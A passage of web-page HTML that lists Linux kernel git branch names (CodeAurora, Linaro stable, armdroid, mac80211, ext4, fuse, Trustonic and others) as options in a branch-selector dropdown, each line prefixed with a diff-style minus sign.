-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.14-rt-test'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.14-rt-test</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.14-test'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.14-test</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/lsk'>caf/3.10/linaro/linux-linaro-stable/lsk</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/lsk-android'>caf/3.10/linaro/linux-linaro-stable/lsk-android</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/origin/linux-linaro-lsk-v3.14-test'>caf/3.10/linaro/linux-linaro-stable/origin/linux-linaro-lsk-v3.14-test</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/topic/v3.10/iks'>caf/3.10/linaro/linux-linaro-stable/topic/v3.10/iks</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/android-fixes'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/android-fixes</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/aosp'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/aosp</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/aosp-warnings'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/aosp-warnings</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm32-cache'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm32-cache</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-be'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-be</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-bl-cpufreq'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-bl-cpufreq</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-cma'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-cma</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-cpu'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-cpu</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-cpuidle'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-cpuidle</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-crypto'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-crypto</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-dma'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-dma</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-fpsimd'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-fpsimd</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-ftrace'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-ftrace</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-fvp'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-fvp</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-hmp'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-hmp</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-hugepages'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-hugepages</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-insn'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-insn</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-kgdb'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-kgdb</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-lts'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-lts</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-misc'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-misc</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-perf'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-perf</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-ptrace'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-ptrace</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-topology'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-topology</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-usb'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/arm64-usb</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/asoc-compress'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/asoc-compress</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/be'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/be</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/big.LITTLE'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/big.LITTLE</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/configs'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/configs</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/cpufreq'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/cpufreq</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/devm'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/devm</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/earlycon'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/earlycon</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/evtstream'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/evtstream</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/exynos'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/exynos</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/gator'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/gator</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/gic-workaround'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/gic-workaround</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/iks'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/iks</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/interactive'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/interactive</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/juno'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/juno</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/mailbox'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/mailbox</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/misc'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/misc</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/mm'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/mm</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/mm-timer'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/mm-timer</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/netdrv'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/netdrv</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/of'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/of</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/old-arm64-be'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/old-arm64-be</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/old-arm64-cma'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/old-arm64-cma</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/old-arm64-hugepages'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/old-arm64-hugepages</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/old-arm64-topology'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/old-arm64-topology</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/old-evtstream'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/old-evtstream</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/pe-wq'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/pe-wq</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/pinctrl'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/pinctrl</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/tagged-pointers'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/tagged-pointers</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/tc2'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/tc2</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/topology'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/topology</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/usb'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/usb</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.10/topic/warnings'>caf/3.10/linaro/linux-linaro-stable/v3.10/topic/warnings</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/aosp'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/aosp</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-be'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-be</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-bl-cpufreq'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-bl-cpufreq</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-cma'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-cma</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-cmadma'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-cmadma</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-crypto'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-crypto</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-ftrace'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-ftrace</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-fvp'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-fvp</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-hugepages'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-hugepages</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-kgdb'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-kgdb</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-lts'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-lts</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-perf'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-perf</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-topology'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-topology</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-usb'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/arm64-usb</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/configs'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/configs</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/earlycon'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/earlycon</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/juno'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/juno</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/mailbox'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/mailbox</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/misc'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/misc</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.14/topic/usb'>caf/3.10/linaro/linux-linaro-stable/v3.14/topic/usb</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.9/android-fixes'>caf/3.10/linaro/linux-linaro-stable/v3.9/android-fixes</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.9/big-little-arm'>caf/3.10/linaro/linux-linaro-stable/v3.9/big-little-arm</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.9/configs'>caf/3.10/linaro/linux-linaro-stable/v3.9/configs</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.9/iks'>caf/3.10/linaro/linux-linaro-stable/v3.9/iks</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.9/linaro-builddeb-tweaks'>caf/3.10/linaro/linux-linaro-stable/v3.9/linaro-builddeb-tweaks</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.9/vexpress'>caf/3.10/linaro/linux-linaro-stable/v3.9/vexpress</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/v3.9/ynk-fixes'>caf/3.10/linaro/linux-linaro-stable/v3.9/ynk-fixes</option>
-<option value='caf/3.10/linux-2.6-armdroid/2.6.33-armdroid'>caf/3.10/linux-2.6-armdroid/2.6.33-armdroid</option>
-<option value='caf/3.10/linux-2.6-armdroid/2.6.35-armdroid'>caf/3.10/linux-2.6-armdroid/2.6.35-armdroid</option>
-<option value='caf/3.10/linux-2.6-armdroid/2.6.38-armdroid'>caf/3.10/linux-2.6-armdroid/2.6.38-armdroid</option>
-<option value='caf/3.10/linux-2.6-armdroid/linux-3.10-armdroid-binder'>caf/3.10/linux-2.6-armdroid/linux-3.10-armdroid-binder</option>
-<option value='caf/3.10/linux-2.6-armdroid/linux-3.10-armdroid64'>caf/3.10/linux-2.6-armdroid/linux-3.10-armdroid64</option>
-<option value='caf/3.10/linux-2.6-armdroid/linux-3.10-armdroid64-new-ABI'>caf/3.10/linux-2.6-armdroid/linux-3.10-armdroid64-new-ABI</option>
-<option value='caf/3.10/linux-2.6-armdroid/linux-3.13-armdroid-binder-compat'>caf/3.10/linux-2.6-armdroid/linux-3.13-armdroid-binder-compat</option>
-<option value='caf/3.10/linux-2.6-armdroid/linux-3.3-armdroid'>caf/3.10/linux-2.6-armdroid/linux-3.3-armdroid</option>
-<option value='caf/3.10/linux-2.6-armdroid/linux-3.6-armdroid'>caf/3.10/linux-2.6-armdroid/linux-3.6-armdroid</option>
-<option value='caf/3.10/linux-2.6-armdroid/linux-3.7-armdroid'>caf/3.10/linux-2.6-armdroid/linux-3.7-armdroid</option>
-<option value='caf/3.10/linux-2.6-armdroid/linux-3.8-armdroid-ashmem'>caf/3.10/linux-2.6-armdroid/linux-3.8-armdroid-ashmem</option>
-<option value='caf/3.10/linux-2.6-armdroid/linux-3.8-armdroid-binder'>caf/3.10/linux-2.6-armdroid/linux-3.8-armdroid-binder</option>
-<option value='caf/3.10/linux-2.6-armdroid/linux-3.8-armdroid-binder-temp'>caf/3.10/linux-2.6-armdroid/linux-3.8-armdroid-binder-temp</option>
-<option value='caf/3.10/mac80211-next/for-john'>caf/3.10/mac80211-next/for-john</option>
-<option value='caf/3.10/mac80211-next/genl-rework'>caf/3.10/mac80211-next/genl-rework</option>
-<option value='caf/3.10/mac80211-next/master'>caf/3.10/mac80211-next/master</option>
-<option value='caf/3.10/mac80211-next/merge-wnext-w'>caf/3.10/mac80211-next/merge-wnext-w</option>
-<option value='caf/3.10/mac80211-next/radiotap-vendor'>caf/3.10/mac80211-next/radiotap-vendor</option>
-<option value='caf/3.10/mac80211-next/rfkill-gpio-cleanups'>caf/3.10/mac80211-next/rfkill-gpio-cleanups</option>
-<option value='caf/3.10/mac80211-next/statistics'>caf/3.10/mac80211-next/statistics</option>
-<option value='caf/3.10/mac80211-next/wip'>caf/3.10/mac80211-next/wip</option>
-<option value='caf/3.10/master_kb_kw.3'>caf/3.10/master_kb_kw.3</option>
-<option value='caf/3.10/master_rb1.18'>caf/3.10/master_rb1.18</option>
-<option value='caf/3.10/master_rb1.19'>caf/3.10/master_rb1.19</option>
-<option value='caf/3.10/maxtouch-3.0/for-upstream'>caf/3.10/maxtouch-3.0/for-upstream</option>
-<option value='caf/3.10/maxtouch-3.0/gen2-active-stylus'>caf/3.10/maxtouch-3.0/gen2-active-stylus</option>
-<option value='caf/3.10/maxtouch-3.0/maxtouch-v2.6.35'>caf/3.10/maxtouch-3.0/maxtouch-v2.6.35</option>
-<option value='caf/3.10/maxtouch-3.0/maxtouch-v2.6.39'>caf/3.10/maxtouch-3.0/maxtouch-v2.6.39</option>
-<option value='caf/3.10/maxtouch-3.0/maxtouch-v3.0'>caf/3.10/maxtouch-3.0/maxtouch-v3.0</option>
-<option value='caf/3.10/maxtouch-3.0/maxtouch-v3.10'>caf/3.10/maxtouch-3.0/maxtouch-v3.10</option>
-<option value='caf/3.10/maxtouch-3.0/maxtouch-v3.14'>caf/3.10/maxtouch-3.0/maxtouch-v3.14</option>
-<option value='caf/3.10/maxtouch-3.0/t107-active-stylus'>caf/3.10/maxtouch-3.0/t107-active-stylus</option>
-<option value='caf/3.10/mmotm/master'>caf/3.10/mmotm/master</option>
-<option value='caf/3.10/msm-3.10'>caf/3.10/msm-3.10</option>
-<option value='caf/3.10/mstar-touch/master'>caf/3.10/mstar-touch/master</option>
-<option value='caf/3.10/stmems/master'>caf/3.10/stmems/master</option>
-<option value='caf/3.10/synaptics-dsx-v2.1/master'>caf/3.10/synaptics-dsx-v2.1/master</option>
-<option value='caf/3.10/tizen_0.3'>caf/3.10/tizen_0.3</option>
-<option value='caf/3.10/tmp-f3fe28f'>caf/3.10/tmp-f3fe28f</option>
-<option value='caf/3.10/torvalds/master'>caf/3.10/torvalds/master</option>
-<option value='caf/3.10/torvalds/next'>caf/3.10/torvalds/next</option>
-<option value='caf/3.10/wireless-regdb/master'>caf/3.10/wireless-regdb/master</option>
-<option value='caf/3.10/wireless-testing/master'>caf/3.10/wireless-testing/master</option>
-<option value='caf/3.14/LA.HB.1.1.1_rb1.10'>caf/3.14/LA.HB.1.1.1_rb1.10</option>
-<option value='caf/3.14/LA.HB.1.1.1_rb1.12'>caf/3.14/LA.HB.1.1.1_rb1.12</option>
-<option value='caf/3.14/caf/ext4/kernel.org/3.2-punch-fix'>caf/3.14/caf/ext4/kernel.org/3.2-punch-fix</option>
-<option value='caf/3.14/caf/ext4/kernel.org/backport-to-3.10'>caf/3.14/caf/ext4/kernel.org/backport-to-3.10</option>
-<option value='caf/3.14/caf/ext4/kernel.org/crypto'>caf/3.14/caf/ext4/kernel.org/crypto</option>
-<option value='caf/3.14/caf/ext4/kernel.org/dev'>caf/3.14/caf/ext4/kernel.org/dev</option>
-<option value='caf/3.14/caf/ext4/kernel.org/dev2'>caf/3.14/caf/ext4/kernel.org/dev2</option>
-<option value='caf/3.14/caf/ext4/kernel.org/fltest'>caf/3.14/caf/ext4/kernel.org/fltest</option>
-<option value='caf/3.14/caf/ext4/kernel.org/for-stable'>caf/3.14/caf/ext4/kernel.org/for-stable</option>
-<option value='caf/3.14/caf/ext4/kernel.org/for-stable-2.6.27'>caf/3.14/caf/ext4/kernel.org/for-stable-2.6.27</option>
-<option value='caf/3.14/caf/ext4/kernel.org/for_linus'>caf/3.14/caf/ext4/kernel.org/for_linus</option>
-<option value='caf/3.14/caf/ext4/kernel.org/for_linus_merged'>caf/3.14/caf/ext4/kernel.org/for_linus_merged</option>
-<option value='caf/3.14/caf/ext4/kernel.org/for_linus_urgent'>caf/3.14/caf/ext4/kernel.org/for_linus_urgent</option>
-<option value='caf/3.14/caf/ext4/kernel.org/i915-test-4.2.0-rc4'>caf/3.14/caf/ext4/kernel.org/i915-test-4.2.0-rc4</option>
-<option value='caf/3.14/caf/ext4/kernel.org/master'>caf/3.14/caf/ext4/kernel.org/master</option>
-<option value='caf/3.14/caf/ext4/kernel.org/merge-fixup'>caf/3.14/caf/ext4/kernel.org/merge-fixup</option>
-<option value='caf/3.14/caf/ext4/kernel.org/origin'>caf/3.14/caf/ext4/kernel.org/origin</option>
-<option value='caf/3.14/caf/ext4/kernel.org/test'>caf/3.14/caf/ext4/kernel.org/test</option>
-<option value='caf/3.14/caf/ext4/kernel.org/test-mb_generate_buddy-failure'>caf/3.14/caf/ext4/kernel.org/test-mb_generate_buddy-failure</option>
-<option value='caf/3.14/caf/ext4/kernel.org/unstable'>caf/3.14/caf/ext4/kernel.org/unstable</option>
-<option value='caf/3.14/caf/fuse/kernel.org/for-linus'>caf/3.14/caf/fuse/kernel.org/for-linus</option>
-<option value='caf/3.14/caf/fuse/kernel.org/for-next'>caf/3.14/caf/fuse/kernel.org/for-next</option>
-<option value='caf/3.14/caf/fuse/kernel.org/master'>caf/3.14/caf/fuse/kernel.org/master</option>
-<option value='caf/3.14/caf/fuse/kernel.org/sync_release'>caf/3.14/caf/fuse/kernel.org/sync_release</option>
-<option value='caf/3.14/caf/gnd/MC12'>caf/3.14/caf/gnd/MC12</option>
-<option value='caf/3.14/caf/gnd/tbase-400'>caf/3.14/caf/gnd/tbase-400</option>
-<option value='caf/3.14/caf/tmp-f3fe28f'>caf/3.14/caf/tmp-f3fe28f</option>
-<option value='caf/3.14/github-ite-touch/input'>caf/3.14/github-ite-touch/input</option>
-<option value='caf/3.14/github-ite-touch/master'>caf/3.14/github-ite-touch/master</option>
-<option value='caf/3.14/github-stmems/master'>caf/3.14/github-stmems/master</option>
-<option value='caf/3.14/github-stmems2/master'>caf/3.14/github-stmems2/master</option>
-<option value='caf/3.14/github-trustonic/Int250'>caf/3.14/github-trustonic/Int250</option>
-<option value='caf/3.14/github-trustonic/Int280'>caf/3.14/github-trustonic/Int280</option>
-<option value='caf/3.14/github-trustonic/MC12'>caf/3.14/github-trustonic/MC12</option>
-<option value='caf/3.14/github-trustonic/MC12+'>caf/3.14/github-trustonic/MC12+</option>
-<option value='caf/3.14/github-trustonic/androidMReady_301B'>caf/3.14/github-trustonic/androidMReady_301B</option>
-<option value='caf/3.14/github-trustonic/master'>caf/3.14/github-trustonic/master</option>
-<option value='caf/3.14/github-trustonic/reviewedSept03'>caf/3.14/github-trustonic/reviewedSept03</option>
-<option value='caf/3.14/github-trustonic/tbase-202'>caf/3.14/github-trustonic/tbase-202</option>
-<option value='caf/3.14/github-trustonic/tbase-300'>caf/3.14/github-trustonic/tbase-300</option>
-<option value='caf/3.14/github-trustonic/tbase-400'>caf/3.14/github-trustonic/tbase-400</option>
-<option value='caf/3.14/github_anx-sw/master'>caf/3.14/github_anx-sw/master</option>
-<option value='caf/3.14/korg-groeck-staging/hwmon'>caf/3.14/korg-groeck-staging/hwmon</option>
-<option value='caf/3.14/korg-groeck-staging/hwmon-next'>caf/3.14/korg-groeck-staging/hwmon-next</option>
-<option value='caf/3.14/korg-groeck-staging/hwmon-staging'>caf/3.14/korg-groeck-staging/hwmon-staging</option>
-<option value='caf/3.14/korg-groeck-staging/master'>caf/3.14/korg-groeck-staging/master</option>
-<option value='caf/3.14/korg-groeck-staging/master-fixes'>caf/3.14/korg-groeck-staging/master-fixes</option>
-<option value='caf/3.14/korg-groeck-staging/watchdog'>caf/3.14/korg-groeck-staging/watchdog</option>
-<option value='caf/3.14/korg-groeck-staging/watchdog-next'>caf/3.14/korg-groeck-staging/watchdog-next</option>
-<option value='caf/3.14/korg-jberg/mac80211-next/fast-rx'>caf/3.14/korg-jberg/mac80211-next/fast-rx</option>
-<option value='caf/3.14/korg-jberg/mac80211-next/fast-xmit'>caf/3.14/korg-jberg/mac80211-next/fast-xmit</option>
-<option value='caf/3.14/korg-jberg/mac80211-next/genl-rework'>caf/3.14/korg-jberg/mac80211-next/genl-rework</option>
-<option value='caf/3.14/korg-jberg/mac80211-next/hs2-filter'>caf/3.14/korg-jberg/mac80211-next/hs2-filter</option>
-<option value='caf/3.14/korg-jberg/mac80211-next/master'>caf/3.14/korg-jberg/mac80211-next/master</option>
-<option value='caf/3.14/korg-jberg/mac80211-next/merge-wnext-w'>caf/3.14/korg-jberg/mac80211-next/merge-wnext-w</option>
-<option value='caf/3.14/korg-jberg/mac80211-next/rfkill-gpio-cleanups'>caf/3.14/korg-jberg/mac80211-next/rfkill-gpio-cleanups</option>
-<option value='caf/3.14/korg-jberg/mac80211-next/statistics'>caf/3.14/korg-jberg/mac80211-next/statistics</option>
-<option value='caf/3.14/korg-jberg/mac80211-next/wip'>caf/3.14/korg-jberg/mac80211-next/wip</option>
-<option value='caf/3.14/korg-jberg/mac80211/for-davem'>caf/3.14/korg-jberg/mac80211/for-davem</option>
-<option value='caf/3.14/korg-jberg/mac80211/master'>caf/3.14/korg-jberg/mac80211/master</option>
-<option value='caf/3.14/korg-wireless-testing/master'>caf/3.14/korg-wireless-testing/master</option>
-<option value='caf/3.14/linux-linaro-stable/arm64-v3.10'>caf/3.14/linux-linaro-stable/arm64-v3.10</option>
-<option value='caf/3.14/linux-linaro-stable/eas-test'>caf/3.14/linux-linaro-stable/eas-test</option>
-<option value='caf/3.14/linux-linaro-stable/linus/master'>caf/3.14/linux-linaro-stable/linus/master</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linar-lsk-v3.14-test'>caf/3.14/linux-linaro-stable/linux-linar-lsk-v3.14-test</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk'>caf/3.14/linux-linaro-stable/linux-linaro-lsk</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-android'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-android</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-android-test'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-android-test</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-rt'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-rt</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-rt-test'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-rt-test</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-test'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-test</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.10'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.10</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.10-android'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.10-android</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.10-android-test'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.10-android-test</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.10-rt'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.10-rt</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.10-rt-test'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.10-rt-test</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.10-test'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.10-test</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.14'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.14</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.14-android'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.14-android</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.14-android-test'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.14-android-test</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.14-rt'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.14-rt</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.14-rt-test'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.14-rt-test</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.14-test'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.14-test</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.18'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.18</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.18-android'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.18-android</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.18-android-test'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.18-android-test</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.18-rt'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.18-rt</option>
-<option value='caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.18-rt-test'>caf/3.14/linux-linaro-stable/linux-linaro-lsk-v3.18-rt-test</option>
